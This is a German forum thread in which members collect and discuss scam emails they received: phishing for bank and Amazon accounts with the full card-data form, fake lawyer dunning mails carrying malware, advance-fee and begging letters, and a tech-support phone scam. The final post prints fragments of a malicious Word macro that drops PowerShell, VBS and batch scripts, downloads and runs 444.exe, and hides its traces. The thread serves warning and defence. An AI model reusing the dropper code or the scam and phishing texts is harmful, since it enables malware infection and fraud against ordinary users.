Sammelthread Gefälschte Emails, Trojaner und andere Virenmeldungen

JoPa

Allround-Nichtsnutz
Gerade eben ist eine Masche passiert, die telefonisch ablief. Ein angeblicher Microsoft-Mitarbeiter rief von einer dänischen Nummer an (0045 57 446 8***) und behauptet, am PC seien Viren und er bietet gleich eine Virenentfernung an. Man soll nach "tocoms" googlen und die Fernsteuersoftware "Ammyy Admin" starten.

Wenn man echt so doof ist, wird ein SYSKEY-Password eingeschaltet, wodurch jetzt auf einmal beim nächsten Rebooten ein weiteres Login-Password verlangt wird.

In der Folge ruft der Betrüger nochmal an und schlagt kostenpflichten Service vor.

Entfernen kann man das Syskey-Passwort mit der richtigen Linux-Boot-CD mit der neuesten Version von CHNTPW, z.B. http://computernetworkingnotes.com/xp-tips-and-trick/remove-administrator-password.html

Das gab's doch schon mal...
http://www.tagesspiegel.de/medien/d...t-support-betrug-weitet-sich-aus/7965604.html
 

g202e

The Long Man
DB-Scam.JPG


Sieht doch ganz gut aus, gelle?
Mein Name ist auch vollständig und richtig geschrieben - ABER: Isch habe GAR KEIN Konto bei der DB.

Der (angebliche) Verifizierungslink geht dann auch nach online-banking.deutsche.baank.org

Gut gefälscht, wenn auch ohne Zertifikat...
 

Belzeboter

Zombie
Das hatte ich auch vorige Woche, an Freenet-Mail und den dort registrierten
Namen (was nicht mein Richtiger ist)
Da hat wohl jemand die UI-Datenbank angeknabbert ? :(

Zumindest der Absender "service@deutsche-bank.de" ist für einen unbedarften
User bedenklich - gut, den kann man fälschen, aber das weiß der DAU nicht.....


-Belzeboter-
 

g202e

The Long Man
Ich wollte das jetzt mal an die Bank weiterleiten, habe aber leider keine "empfängnisbereite" Email-Adresse von irgendeiner Sicherheitsabteilung oder sowas gefunden.
Bei Weiterleitung an deutschebank(at)db.com schlägt deren Spamfilter zu und verweigert die Annahme...naja
Das Gleiche passiert bei security.db(at)db.com...
 
Zuletzt bearbeitet:

g202e

The Long Man
Meine Frau hat gerade eben folgende Email bekommen:
AnwaltScam.JPG
Die IP scheint irgendwie "undeutsch" - ok, registriert in Indianapolis
Die cab-Datei ist natürlich böse(sagt NOD32).
Aber was soll das? Kann man eine cab ausführen? Oder glauben die, man zahlt ohne die "Rechnung" gesehen zu haben?
 

chaospir8

★★★★★-Oldie
@g202e
Ich habe so etwas auch an meine primäre, private E-Mail-Adresse bekommen. Anderer Film. Andere IP-Adresse (irgendwo in Südkorea). Und billiger soll ich davonkommen ... nur ca. 380 Euro. Anhang: die von Dir genannte CAB-Datei in der sich eine einzige EXE befindet. Gestartet habe ich nicht.
 

Zapata

Bekanntes Mitglied
Aber was soll das? Kann man eine cab ausführen? Oder glauben die, man zahlt ohne die "Rechnung" gesehen zu haben?
CAB ist ja bekanntermaßen ein Archivdateiformat, das von Microsoft verwendet wird und unter Windows ohne weiteres geöffnet werden kann. In den letzten Wochen/Monaten wird Schadsoftware in E-Mails vermehrt in cab-Dateien gepackt, weil viele Firewalls dieses Format nicht auf dem Schirm haben und durchlassen. Je nach Unternehmensphilosophie und Firewall werden neben den ausführbaren Dateien (exe, bat, ...) oft nur die Standardarchivformate (zip, rar, ...) geblockt. Mit cab-Dateien können Angreifer in manchen/vielen Fällen diese erste Hürde überwinden und einen Endanwender dazu verleiten, die enthaltene Schadsoftware auszuführen ("Mitarbeiter klicken auf alles").

Zapata
 
Zuletzt bearbeitet:

JoPa

Allround-Nichtsnutz
Nach 5 Tagen schon per Anwalt mahnen? :icon_lol::icon_lol::icon_lol:
Und dann noch gleich 3x auf unbenutzten Adressen, die nur durch Catchall durchkommen... :icon_knock::icon_knock::icon_knock:


Code:
Sehr geehrter Kunde,


in der unten aufgefuhrten Angelegenheit wurden wir berechtigt die finanziellen Interessen von Limango Shop GmbH zu vertreten.
Die Bevollmachtigung wird anwaltlich versichert.
Mit der Rechnung vom 7.08.2014 haben Sie sich verpflichtet die Summe von 453,15 Euro an unseren Mandanten zu zahlen.
Dieser Pflicht sind Sie bis heute nicht nachgekommen.
Weiterhin sind Sie aus Grunden des Verzuges dazu verpflichtet die Kosten unserer Inanspruchnahme zu tragen.

Diese belaufen sich nach folgender Kostenrechnung:

EUR 64,00 (Pauschalvergutung gema? § 2 Abs. 9 und 2 RVG}
EUR 82,00 (nach Nr. 887 VV RGV} Wir verpflichen Sie Namens und Kraft Vollmacht unserer Mandantschaft auf den Gesamtbetrag auf das Bankkonto unseren Mandanten zu uberweisen.


Die Kontodaten und die Lieferdaten Ihrer Bestellung finden Sie im angehangtem Ordner.
Fur den Eingang der Zahlung geben wir Ihnen eine gesetzliche Zeitfrist bis zum 6.08.2014.
Wenn Sie diese zeitliche Frist fruchtlos verstreichen, mussen Sie damit rechnen,
dass wir ohne weitere Aufforderung gerichtliche Schritte einleiten werden.
Dadurch wurden Ihnen weitere, betrachtliche Mahnkosten entstehen.
Das Einhalten dieser zeitlichen Frist liegt auf jedem Fall in Ihrem Interesse.
 

eumelfrau

Bekanntes Mitglied
Das war im Spam-Ordner, die 2. zip enthielt dann die Endung com, also eindeutig spam:


Sehr geehrte/r ...,
Sie haben eine nicht bezahlte Forderung bei unseren Mandanten Paypal GmbH. Das von Ihnen gespeicherte Bankkonto wurde im Moment der Abbuchung nicht genügend gedeckt um die Lastschrift durchzuführen. Namens unseren Mandanten fordern wir Sie auf, die offene Gesamtforderung unverzüglich zu begleichen.
Die Überweisung erwarten wir bis spätestens 19.08.2014. Für Rückfragen oder Anregungen erwarten wir eine Kontaktaufnahme innerhalb des gleichen Zeitraums. Aufgrund des bestehenden Zahlungsverzug sind Sie verpflichtet zuzüglich, die durch unsere Beauftragung entstandenen Kosten von 49,22 Euro zu tragen.
Die Kontakt Telefonnummer und weitere Informationen ersehen Sie in Ihrer Rechnung anbei. Es erfolgt keine weitere Mahnung. Nach Ablauf der Frist wird die Angelegenheit dem Gericht und der Schufa übergeben. Eine vollständige Forderungsausstellung, der Sie alle Einzelpositionen entnehmen können, fügen wir bei.
Mit verbindlichen Grüßen
Paypal GmbH
Beauftragter Rechtsanwalt Carl Keller
 

eumel_1

Der Reisende
Hier mal wieder eine schlecht gefakte Mail, aber der DAU fällt womöglich drauf rein:
---------------------------------------------------------------------------
Wir brauchen Ihre Hilfe

aufgrund der steigenden Zahlungsausfalle mittels Lastschrift- und Rechnungszahlung,
ist es in Zukunft leider nicht mehr moglich, eine Zahlung bei Amazon.de mit diesen Zahlungsarten ohne hinterlegte Kreditkarte zu tatigen. Daher ist es notwendig, dass alle Kunden eine Kreditkarte als Zahlungsmittel hinterlegen.

Sollten Sie bereits eine Kreditkarte hinterlegt haben, bitten wir Sie, die bereits hinterlegte Kreditkarte zu verifizieren. Sollten Sie noch keine Kreditkarte besitzen, legen wir Ihnen gerne die Amazon VISA-Kreditkarte ans Herz. Nutzen Sie zur Verifizierung bitte den folgenden Link: Zum Sicherheitsverfahren - http://amazondeacccheck.com

Bitte beachten Sie, dass Sie Ihr Amazon.de-Kundenkonto ohne hinterlegte Kreditkarte in Zukunft nicht mehr nutzen konnen.


Mit freundlichen Grußen,
Ihr Amazon.de Kundenservice

---------------------------------------------------------------------------
Habe mal die Links unbrauchbar gemacht, sonst klickt da noch jemand erfolgreich drauf :D

PS: wenn man den Link erfolgreich klickt, passiert erstmal noch nix, aber schon die Fragen dort sind super:
Hilfe zur Verifizierung

Diese Verifizierung ist notwendig, wenn der Verdacht auf fremdem Kontozugriff besteht.
Dieser Vorgang dient Ihrer Sicherheit und ist notwendig, um ihr Amazon-Konto weiterhin
uneingeschränkt nutzen zu können.

Verifizieren (Schritt 1)
Wie lautet Ihre E-Mail-Adresse?
Meine E-Mail-Adresse: *
Wie lautet Ihr - Passwort?
Mein Passwort: *
Bitte tragen sie Nachfolgend Ihren Namen, Ihre Anschrift und ihr Geburtsdatum ein: (Schritt 2)
Vor- und Nachname: *
Straße: *
PLZ: *
Ort: *
Geburtsdatum: * . .
Bitte tragen sie Nachfolgend Ihre hinterlegten Konto ggf. Kreditkartendaten ein : (Schritt 3)
Karteninhaber (Kreditkarte): *
Kartennummer (Kreditkarte): *
Kartenlimit (zb. 1450€): €
CVV (3-Stelliger Sicherheitscode): *
Ablaufdatum (Monat/Jahr): * /
3-D SecureCode (Falls vorhanden):
Abrechnungskonto (Kontonummer):
Bankleitzahl:
IBAN (nur letzte 10 Ziffern):
Daten Absenden über den Sicherheitsserver: (Schritt 4)

Wer da seine Daten einträgt hat bestimmt danach Bewegung auf seinem Konto :D
Man beachte auch die Anzahl der Sterne (mandatory questions)!
 

vaGem

Bekanntes Mitglied
Bekomm ich momentan 2x die Woche

Re: Mahnung! Aktenzeichen 4785621

ACHTUNG! EILT SEHR! Bankgeheimnis aufgedeckt!

Junger Genie kanckt ein Bankencode und lüftet ein Geheimnis!

Banken verdienen mit Kundengelder wie von Ihnen viele Millionen am Tag; schütten aber kaum Zinsen aus!

Wirtschaftsstudent und Börsenliebhaber aus Frankfurt hat das Geheimnis gelüftet. Jetzt verdient er mit dieser Strategie vollautomatisch 3000 Euro die Woche!

Er hat das System geändert und ein Patent angemeldet! Jetzt verschenkt er diese Software an 200 Menschen wie Sie.

Laut Pressebericht hat er schon über 2000 Kaufangebote von bis zu 100 Millionen Dollar bekommen.

Banken werden jetzt alles dafür tun, damit Sie diese Software nicht testen! Negativmarketing, Sperrungen etc. Hauptsache die Menschcheit bekommt nicht mit, wie leicht und schnell Banken mit unserem Geld ein Vermögen verdienen!

Nutzen Sie jetzt die Chance und nutzen Sie schnell die Software, bevor eine Bank dieses Patent aufkauft! Wenn Sie jetzt noch eine kostenfreie Lizenz bekommen, dann dürfen Sie diese Software ein Leben lang kostenfrei nutzen!

Wird es aber in den nächsten Stunden verkauft, so sind Sie zu spät! Diese Chance gibt es alle 50 Jahre!

Ein Notar hat es mit einem Rechtsanwalt getestet!
Ergebnis: 20 von 20 Tests waren erfolgreich
Kommentar:
„Software funktioniert einwandfrei und ist 100% legal“

10 Tage lang liefen die Tests. Ergebnis war ein Verdienst von 5.998,10 Euro

Nutzen Sie diese Chance und holen Sie sich schnell einen Zugang bevor es zu spät ist!

Es ist 100% kostenlos + 100% legal + 100% Geld-zurück-Garantie auf Ihre Einlagen(12 Monate lang)

Hier geht es zum Pressebericht: >>>hier klicken<<<

Bitte beachten: Auf Grund der hohen Nachfrage werden wir diese Seite erst in 5-10 Minuten wieder online stellen

Der Link führt nach handelsbank.c...
oder dieses

Re: Mahnung! Aktenzeichen: AZ4585621

Achtung! EILMELDUNG! Banken stink-sauer! Presse dreht durch! NTV und N24 berichten LIVE


19 jähriger Aktien/Börsen-Genie und ein Programmierer entwickeln eine Handelssoftware, die vollautomatisch mindestens 389,01 Euro pro Tag generiert!

Banken sind stink-sauer, denn dieser Genie hat einen Bankencode geknackt! Banken verdienen mit einer vergleichbaren Software viele Millionen pro Tag.

Momentan gibt es schon 1920 Kaufangebote für diese Software. Angebote bis zu 100 Millionen Euro soll er angeblich schon bekommen haben!
Alle Angebote wurden abgelehnt! Jetzt verschenkt der Erfinder diese Onlinesoftware an handvoll Anwender WIE SIE, damit er den Verkaufspreis noch höher treiben kann.

Die Banken werden alles versuchen um dieses Angebot schlecht zu machen, denn die Banken werden immer nervöser, weil sie nicht wollen, dass zu viele Menschen davon erfahren wie leicht und schnell Banken Geld verdienen!

Wir gehen davon aus, dass dieses Angebot in wenigen Stunden nicht mehr verfügbar sein wird.

Schauen Sie sich hier die Reportage an: >>VIDEO<<

Weitere Fakten:

  • Absolut kostenlos

  • Kein Risiko

  • 20 von 20 Tests waren erfolgreich

  • GARANTIERTES Einkommen von mindestens 200 Euro pro Tag

  • Geld zurück Garantie für 12 Monate

  • Notar hat bestätigt: "Mindesteinkommen von 200 Euro pro Tag wird erreicht"
Schauen Sie sich hier die Reportage an: >>VIDEO<<

Die Links zum Video sind auf megabank.c...

Obwohl ich neugierig bin, konnte ich mich zurückhalten. Naja, vielleicht mach ich mir mal den Spaß mit
meinem Laptop. Der muss eh mal neu aufgesetzt werden.
 

eumel_1

Der Reisende
Wo ist da die Abzocke?
Das ist IMHO der normale SPAM, davon bekomme ich auch jede Menge, momentaner Tophit ist die Masche mit der Verführung von Frauen (kein genauerer Text mehr möglich, weil sofort gelöscht)
 

vaGem

Bekanntes Mitglied
Ups, da hab ich was vergessen zu posten

Jetzt mit nur 200€ Ihr eigenes Konto eröffnen.

Aber es stimmt, eigentlich der normale Spam, die Leute sind selbst schuld
200€ für ein Konto zu geben
 

Nostradamus

Zensur besteht aus Frechheit und Angst. Tucholsky
Ich versteh es nur nicht. So was kann doch eigentlich nur weiter Bestand haben wenn es sich für die Spinner lohnt, wenn also Absatz da ist.
Aber um auf solche Schundmails ernsthaft zu reagieren muss man doch ein unwahrscheinlich geistiger Tiefflieger sein, eigentlich noch unter dem IQ eines Neandertalers angesiedelt sein. Wobei das vermutlich schon eine Beleidigung der Neandertaler ist. Ist es denn tatsächlich so schlimm um die Menschheit bestellt?
 

vaGem

Bekanntes Mitglied
Die hoffen auf die Geldgier der Menschheit. Mit nix tun viel Geld machen, da lohnen sich 200€ doch.
Ausserdem hat man ja eine 12 Monatige Geldzurückgarantie, also kein Risiko :yo:icon_tsts:
 

xtraa_

Serviervorschlag
Falsches Flash Update umgeht Chromes Sicherheitssystem
Security experts at TrendMicro believe that the malware is triggered by opening Facebook or Twitter via shortened links provided in any social networking websites. Once clicked, the links may lead victims to a site that automatically downloads the malicious browser extension.

MALWARE INVOLVES DOWNLOADING MULTIPLE MALICIOUS FILES
The process is quite complicated as the malware drops a downloader file which downloads multiple malicious files on the victim’s computer. Moreover, the malicious program also has ability to bypass Google's recent security protection added to Chrome against installation of browser extensions that are not in Chrome Web Store.

Erwähnenswert ist offenbar, dass sich die Software automatisch runterlädt.

http://thehackernews.com/2014/09/malware-can-bypasses-chrome-extension.html

Gruß
xtraa
 

JoPa

Allround-Nichtsnutz
Wenn ich es richtig verstehe, gilt das nur für Chrome-User. Kann ich mich mit dem FF nun sicher fühlen?
 

Nostradamus

Zensur besteht aus Frechheit und Angst. Tucholsky
Ich versteh es nur nicht. So was kann doch eigentlich nur weiter Bestand haben wenn es sich für die Spinner lohnt, wenn also Absatz da ist.
Aber um auf solche Schundmails ernsthaft zu reagieren muss man doch ein unwahrscheinlich geistiger Tiefflieger sein, eigentlich noch unter dem IQ eines Neandertalers angesiedelt sein. Wobei das vermutlich schon eine Beleidigung der Neandertaler ist. Ist es denn tatsächlich so schlimm um die Menschheit bestellt?

Ja heute war ich wieder bei so einem. Mein bekannter alter "Kunde". Der ist echt so dämlich, dass ihn die Schweine beißen :icon_lol:
Gestern hat er eine Mail vorn einem Rechtsanwalt bekommen, Mahnung und Mahngebüren, weil sein Konto nicht gedeckt wäre und Amazon kein Geld buchen konnte, Details zur Rechnung im Anhang :icon_funny::D
Den Anhang hat er geöffnet, ist aber angeblich nichts passiert weder einen Word noch PDF Datei hat sich geöffnet :icon_lol:
Und dann hat er dem Absender geantwortet und gefragt was das für ein Unsinn sein soll, dass sich a die Rechnung nicht öffnen lässt und er b keine Schulden bei Amazon hat. Antwort hat er noch keine :icon_funny::icon_lol:
Ich könnt mich auf den Boden hauen.
Natürlich war alles verseucht.
Angerufen hat er mich aber eigentlich nur weil Firefox nicht mehr startete.
Und an der Stelle muss ich mal sagen auch die Viren Macher sind nicht mehr das was sie mal waren. Dieser hatte anstelle von Hirnmasse offensichtlich nur Scheiße im Kopf.
Ich mein wie kann ich als Virenprogrammierer den Browser lahmlegen, so das der User erst drauf aufmerksam wird das was faul ist.
Wäre den sein Browser noch fehlerfrei gestartet, hatte er mich nicht angerufen und würde womöglich monatelang als Zombie-PC durchs Web geistern.
 

g202e

The Long Man
Und dann hat er dem Absender geantwortet
Kommt mir bekannt vor. Auch ein angeblicher Amazon-Schuldner in meinem Bekanntenkreis hatte letztens so eine Mail.
Mein "Client" hat zwar den Anhang nicht geöffnet, aber er hat dem Absender(Rechtsabteilung Amazon mit der Emailadresse "bluefox(at)t-online.de") geantwortet und diesem mitgeteilt, dass sein Konto zum Zeitpunkt der angeblich misslungenen Abbuchung mit gut 1300 Teuronen gut gefüllt war. Hilfe! :icon_knock:
 

jr33

.......
Email, kein Anhang, kein Link, nur
ne linke Masche:

Hoffe, Sie bekommen, diese wichtige Nachricht in guter Gesundheit zu lesen.

Ich habe eine Geschäftsmöglichkeit, dringend mit Ihnen teilen, die einen Gesamtbetrag von 18.000.000,00 Millionen (USD) beinhaltet. Das Geld wurde hinten von einem verstorbenen Kunden von meiner Bank gelassen. Ich kontaktiere Sie, um Ihre vertrauensvolle Partnerschaft bei der Aufnahme dieser Mittel zu suchen. Wenn Sie interessiert sind, antworten Sie bitte sofort für detaillierte Informationen.

Mit freundlichen Grüßen,

D. Mitch

Absender: De Mitch <de_mitch207@login.holaphone.co.uk>


ich habe gerade keine zeit, wenn also jemand absahnen möchte, nur zu....
 

g202e

The Long Man
Eine Bekannte bekam vor kurzem folgende Email:
Betreff:Ist ihr Passwort 'heizung' ? Ihre Daten sind in Gefahr !
Datum:Tue, 30 Sep 2014 09:26:26 +0100
Von:hackingrescue@secure-mail.biz
An:heizung <xxxxxxx@gmx.de>


Falls Ihnen das oben genannte Passwort bekannt vorkommen sollte - bitte weiterlesen ! Bitte nehmen Sie sich Zeit für die folgende Email, sie ist sehr wichtig für Sie ! Also, Sie werden sich natürlich erstmal fragen von wo ich überhaupt IhrPasswort habe? Ganz einfach erklärt, ich habe es auf einem Schwarzmarkt in den 'dunklen Ecken' des Internets gekauft. Dort werden täglich hunderte Kreditkartendaten, Onlinebankingdaten, Paypalkonten, usw. zum Verkauf angeboten. Und das absolut ohne jegliche Skrupel! Aber - werden Sie sich nun denken - warum habe ich Ihre Daten dort in diesem Schwarzmarkt überhaupt erstanden? Will ich Ihnen etwas Schlechtes ? Nein, auf garkeinen Fall! Sogar im Gegenteil! Sie müssen mich eher als 'Undercover-Engel' unter diesen ganzen Betrügern und Hackern sehen - ich bin dort unterwegs um Menschen wie Sie vor Datenmissbrauch zu schützen ! Alle Datensätze werden nur 1x zum Verkauf angeboten und danach von den Betrügern gelöscht - bedeutet also für Sie, Ihre Daten werden nun nichtweiter in Umlauf gebracht. Da ich selber vor mehreren Jahren Identitätsdiebstahl zum Opfer gefallen bin und dadurch enormen finanziellen Schaden erlitten habe, fühle ich mich nun gezwungen weitere Opfer davor zu beschützen das selbe Dilemma zu durchlaufen. Darum - habe ich Ihre Daten gekauft. Ich möchte Sie vor dem möglichen finanziellen Schaden als auch von den ganzen Unannehmlichkeiten die man bekommt, wenn man z.B. merkt das man aufeinmal keinen Zugriff mehr auf beispielsweiße seinen eigenen Ebayaccount oder seine persönlichen Mails hat, beschützen. Das einzige was die Betrüger im Idealfall brauchen ist der Zugang zu Ihrem Postfach - hier werden einfach alle Passwörter zurückgesetzt / geändert und letztendlich auch das Passwort von Ihrem Postfach - damit sie absolut keinen Zugriff mehr auf irgendetwas haben , und der Betrug mit Ihren Daten seinen Lauf nehmen kann.. Es reicht aber auch schon wenn die Hacker ein bestimmtes Passwort von Ihnenbesitzen - z.B. von Ihrem Paypalkonto - daraus können meistens schonalle relevanten Daten gezogen werden. Es werden beispielsweiße teure Waren welche garnicht existieren unter Ihren Namen zum Verkauf angeboten, wie z.B. iPhones, Notebooks, Spiegelreflexkameras, Designerhandtaschen. Es wird ein Paypal Account mithilfe Ihrer Daten erstellt (falls nicht schonvorhanden) um für den Betrüger teure Waren zu kaufen ! Es werden tausende von Phishing-Mails von Ihrem Konto versendet ! Und noch dutzende weitere Methoden wie die Betrüger an Geld kommen - und meistens bleibt das Opfer dann auf dem entstandenen Schaden sitzen. Stellen Sie sich also vor Ihre Daten hätte nicht ICH gekauft, sondern einanderer, skrupelloser Betrüger - wir können sich beide vorstellen wie das wohl geendet hätte. Diese Mail habe ich Ihnen nun geschrieben um Sie einfach zu informieren, dass Ihre privaten Daten in den Händen (besser gesagt Computer) von einem skrupellosen Betrüger gelandet sind. Die Passwörter stammen meist aus Datenbanken größerer Internetshops welche gehackt wurden - also keine Angst , sie haben warscheinlich keinen Trojaner auf dem PC und müssen Windows auch nicht neu installieren! Ich bitte Sie also, ändern Sie wenn möglich heute noch ihre kompletten Passwörter solange Sie noch die Möglichkeit dazu haben. Solange Sie schnell genug reagieren werden Sie ohne jeglichen Schaden davonkommen. Das ändern aller Ihrer Passwörter sollte hierfür reichen. Bitte sichere Passwörter verwenden ! Leider kann nichts gegen diese Betrüger unternommen werden - sie sitzen hinter IP-Adresse welche nicht zurückverfolgt werden können. Also ist eine Strafanzeige gegen diese zu stellen leider auch sinnlos und führt ins Nichts.. Ändern Ihre Passwörter und Sie sind wieder auf der sicheren Seite ! Wo auch immer Sie diese Nachricht nun lesen, ob Sie gerade in der Arbeit sind oder Zuhause, ich würde mich sehr über ein kleines Dankeschön Ihrerseits für meine 'gute Tat' freuen. Dahinter steckt absolut kein Zwang! Mir reicht auch schon ein kurzes 'Dankeschön!' in meinem Postfach ! Aber nochmal zur Erinnerung - der Erwerb Ihrer Daten war auch für mich mit Kosten verbunden. Falls Sie mir also eine kleine Gegenleistung zukommen lassen möchten, gibt es diese sogenannte PAYSAFECARD - das ist sozusagen ein Zettelchen (Bon) auf welcher sich ein 16-stelliger Code befindet. Bitte auch den Bon als Scan / Foto in der Email mitsenden falls möglich, das wäre echt sehr nett. Hier finden Sie alle Verkaufsstellen in Ihrer Nähe: https://www.paysafecard.com/de-de/kaufen/haendler/ Diese Karten gibt es mit Guthaben im Wert von 10, 15, 20, 25, 30, 50 und 100EUR. Entscheiden Sie selbst was Ihnen meine kleine Warnung wert ist bzw. war. Also falls Sie das nächste mal in Ihren Ort oder Ihre Stadt fahren sollten denken Sie bitte an mich und halten Sie kurz bei der nächsten Tankstelle an.. :) Bitte NICHT auf diese Mail antworten ! Meine Mail-Adresse ist hackingrescue@secure-mail.biz Dort können Sie mich jederzeit kontaktieren. Ich bedanke mich schonmal herzlichst für jedes noch so kleine Dankeschön ! Ich wünsche Ihnen noch einen angenehmen Tag / Abend ! 'Guter Wille und gute Tat sind die Eltern des Glücks.'

Der Witz an der Sache ist jetzt, dass dieses äußerst intelligente Password tatsächlich in der Vergangenheit jahrelang genutzt wurde.

Ist das nur ein besonders freundlich formulierter Erpressungsversuch?
Gibt es irgendeine Möglichkeit, etwas mehr über den Absender zu erfahren?
 

eumel_1

Der Reisende
Das ist der selbsternannte Undercover-Engel, das bedeutet, das ist ein Bettelbrief. Dass man das Passwort natürlich ändern sollte, falls nicht bereits geschehen, muss ich wohl nicht extra erwähnen?
Mehr Info: http://heise.de/-2408702
 

Antitrack

Bekanntes Mitglied
Oder das Password wurde einfach geraten und in der Massenmail verschickt. Motto: 0.1 % der Spam-Empfänger haben "123456" als Passwort! :D
 

eumel_1

Der Reisende
Kam heute gleich zweimal auf eine meiner Uralt-Mailadressen reingeflattert, scheinbar sind mal wieder ein paar uralte Datensätze vertickert worden.

Mal wieder ein Beispiel dafür, wie dumm manche doch sein müssen, um zu schauen, was sie denn bestellt haben:


Eigenschaften verraten dann das es von:
Code:
Received: from vlite.precisionmedia.co.za (vlite.precisionmedia.co.za [78.129.158.139])
kam. Diese Website wiederum scheint bereits gesperrt, denn wenn man da rauf geht, landet man in UK und bekommt eine Fehlermeldung dass man sich an den Provider wenden solle, so man denn der Webmaster sei.
Klicken auf den Link führt zu einer Dropbox, wo dann eine Datei mit dem Namen ZahlungsdatenNVT2N.scr wartet, welche bei Ausführung einen Trojaner installiert, siehe die Auswertung von Virustotal.com:
https://www.virustotal.com/de/file/...a887b151c7161d091a59bfa8/analysis/1414687291/
11 von 53 Virenscannern schlagen an, das ist auf keinen Fall gut, zeigt es doch, dass dieser Trojaner noch neu ist und nicht von allen Scannern erkannt wird. Dumm dran, wenn der eigene Virenscanner ihn nicht erkennt, denn dann läuft man in Gefahr sich unbemerkt einen Trojaner zum einnisten zu verhelfen.

Exkurs für die Nicht-Profis:
Dateiendung .scr ist die Endung für einen Bildschirmschoner, aber dahinter ist einfach eine ausführbare .exe versteckt, welches mit Sicherheit ein Schadprogramm startet. Dies ist eine beliebte Masche, denn so kann der Virenscanner des Providers keine Schadsoftware herausfiltern.
Falls Ihr Euch mal nicht sicher seid, einfach die betreffende Datei zu Virustotal.com hochladen und analysieren lassen. Meine Empfehlung: ab 5 Treffer wird die Datei nicht geöffnet.
 
Zuletzt bearbeitet:

Spaceboy1963

Bekanntes Mitglied
Heute kam eine eMail, das ich ein Fax bekommen habe :)
Das Fax war freundlicherweise als Anlage im MS-Word-Format *.doc dabei :D
Das Öffnen des Dokumentes in der Sandbox brachte zunächst eine Warnung von Word über potentiell gefährliche Inhalte (Macros) und gleichzeitig eine Bedienungsanleitung für das Freigeben von Inhalten in allen WinWord-Varianten (Inhalt des Dokuments) zur Anzeige.
Das Öffnen der Datei im Editor in der Sandbox enthielt neben viel kryptischen Zeichen auch sehr lustige "lesbare" Sequenzen wie

Code:
 c:\windows\temp ¶  \adobeacd-update.p ¶  s  ¶  1  ' (¶  c:\windows\temp ¶  \adobeacd-update.b ¶  a  ¶  t  ' *¶  c:\windows\temp ¶  \adobeacd-update.  ¬ v $ .  ¶  b  ¶  s  ' ,ø  ] òÈ  ] òà  ] òø  ] ò    ° ' 0  ° ' 2  ° ' 4  (  0 « Ì   0 Ò ¶ > $hashroot = '47-ab-cd-f5-8f-bf-f9-1f-94-65-51-7b-96-ea-13-d3';Ö VôÚQ  0 Ò ¶  $hash = '0';Ö aé.aé  0 Ò ¶      $down = N ¶  ew ¶  -O ¶  bject Sy ¶  stem.N ¶  et.  ¬ W $ .  ¶  eb ¶  Cli  ¶  ent; Ö      0 Ò ¶ A $hashasd = 'asdjäæûôîâäëôûîâäôûkhasjkdhajkshdiusakhdsakhdkjashd'; Ö  0 Ò ¶ $file = 'c:\windows\temp\4¶  44.e ¶  xe'; Ö ÿÿÿÿ  0 Ò ¶ 2 $hashasd = 'asdjkhasjkdhajkshdiusakhdsakhdkjashd';Ö  0 Ò ¶  $down ¶  .  ¬ D $ .  ¶  ow ¶  nloa ¶  dFi  ¶  le($u  ¶  rl,$ ¶  file); Ö Jÿ  0 Ò ¶ & $ScriptDir = $MyInvocation.ScriptName;Ö ±}Jÿ  0 Ò ¶ + $someFilePath = 'c:\windows\temp\' + '444.e ¶  xe ¶  '; Ö        0 Ò ¶ 6 $vbsFilePath = 'c:\windows\temp\' + 'adobeacd-update.v¶  b  ¶  s';  Ö    0 Ò ¶ 6 $batFilePath = 'c:\windows\temp\' + 'adobeacd-update.b¶  a  ¶  t';  Ö    0 Ò ¶ 5 $psFilePath = 'c:\windows\temp\' + 'adobeacd-update.p ¶  s  ¶  1';  Ö  à  , Print #FileNumber, "Do { Start-Sleep -s 10;"      à  g Print #FileNumber, "$md5 = New-Object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider;"  à  € Print #FileNumber, "$hash = [System.BitConverter]::ToString($md5.ComputeHash([System.IO.File]::ReadAllBytes($someFilePath))); }"  à  4 Print #FileNumber, "Until ($hash -Match $hashroot);"        0 Ò ¶  Start-Sleep -s 10;Ö  0 Ò ¶  c ¶  m  ¶  d.e  ¬ x $ .  ¶  e /c  'c:\windows\temp\444.e ¬ x $ .  ¶  e';     Ö        0 Ò ¶  $file1 = gci $vbsFilePath -ForceÖ    0 Ò ¶  $file2 = gci $batFilePath -ForceÖ    0 Ò ¶  $file3 = gci $psFilePath -Force Ö    0 Ò ¶ N $file1.Attributes = $file1.Attributes -bxor [System.IO.FileAttributes]::HiddenÖ ÿÿÿÿ  0 Ò ¶ N $file2.Attributes = $file2.Attributes -bxor [System.IO.FileAttributes]::HiddenÖ      0 Ò ¶ N $file3.Attributes = $file3.Attributes -bxor [System.IO.FileAttributes]::HiddenÖ ÿÿÿÿ  0 Ò ¶ 7 If (Test-Path $vbsFilePath){ Remove-Item $vbsFilePath } Ö ÿÿ  0 Ò ¶ 7 If (Test-Path $batFilePath){ Remove-Item $batFilePath } Ö    0 Ò ¶ 9 If (Test-Path $someFilePath){ Remove-Item $someFilePath } Ö  0 Ò ¶ ( Remove-Item $MyINvocation.InvocationNameÖ    0 V         ,  2 « Ì   2 Ò ¶ g currentDirectory = left(WScript.ScriptFullName,(Len(WScript.ScriptFullName))-(len(WScript.ScriptName))) Ö ÿÿ  2 Ò ¶ @ caisudkasdknadsklasdjaklajksjklasdkjlajkalkadsjasjklajklah38e = ¬ " $ .  ¶  231  ¬ " $ .  Ö  2 Ò ¶  S ¶  et o ¶  bj ¶  F  ¶  SO=C ¶  re ¶  at ¶  eO ¶  b  ¶  je ¶  ct(  ¬ " $ .  ¶  S  ¶  cr ¶  ipt  ¶  ing.F  ¶  ileS ¶  ystem  ¶  Ob ¶  ject ¬ " $ .  ¶  )  Ö ÿÿÿÿ  2 Ò ¶  currentFile = ¬ " $ .  ¶ # c:\windows\temp\adobeacd-update.ps1  ¬ " $ .  Ö ³ÿ  2 Ò ¶  caisudkh38e = ¬ " $ .  ¶  231  ¬ " $ .  Ö    2 Ò ¶
quid8hiqje =  ¬ " $ .  ¶  231  ¬ " $ .  Ö ÿÿ  2 Ò ¶  ¬ S $ .  ¶  et   ¬ o $ .  ¶  bj ¬ S $ .  ¶
